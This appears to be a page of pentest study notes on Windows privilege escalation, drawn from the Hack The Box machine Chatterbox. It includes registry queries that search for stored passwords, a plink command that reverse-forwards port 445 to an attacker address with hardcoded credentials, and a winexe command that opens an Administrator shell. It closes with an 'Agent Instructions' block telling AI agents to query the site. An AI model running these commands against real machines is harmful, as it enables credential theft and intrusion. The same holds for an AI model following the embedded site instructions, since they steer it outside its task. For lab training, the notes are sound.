# Stored Passwords and Port Forwarding

## Overview

Credentials can be stored in the **registry** and some ports are on the machine are only accessible from the inside (itself).

What if the user we landed on **is** an Administrator but just needs to provide credentials to execute commands as system?

## Registry Passwords

```powerquery
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
```

```powerquery
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
```

### Example output

<figure><img src="/files/EkGL9BCwIJIqfw1bm8KH" alt=""><figcaption><p>HTB Machine Chatterbox</p></figcaption></figure>

## Port Forwarding

```
netstat -ano
```

<figure><img src="/files/JR4nRQU0WyY1i8Laz2s0" alt=""><figcaption><p>HTB Machine Chatterbox</p></figcaption></figure>

[Plink](https://www.chiark.greenend.org.uk/~sgtatham/putty/latest.html) is an SSH and Telnet client which will allow us to port forward on the machine

Upload and Run **plink.exe** to make it ssh into your machine via the forwarded local port 445, allowing you to access the local port 445.

```powerquery
plink.exe -l root -pw rootpasswd -R 445:127.0.0.1:445 10.10.14.10
```

You'll be in box inception inside of your attacker machine.

Use **winexe** to start a shell as Administrator over the port forward connection

```bash
winexe -U Administrator%Welcome1 //127.0.0.1 cmd.exe
```

{% hint style="info" %}
If there's a credential being leaked in a **CTF** environment chances are it leads to something else so don't disregard it&#x20;
{% endhint %}

{% embed url="<https://sushant747.gitbooks.io/total-oscp-guide/content/privilege_escalation_windows.html>" %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://pnpt.adot8.com/windows-privilege-escalation/stored-passwords-and-port-forwarding.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.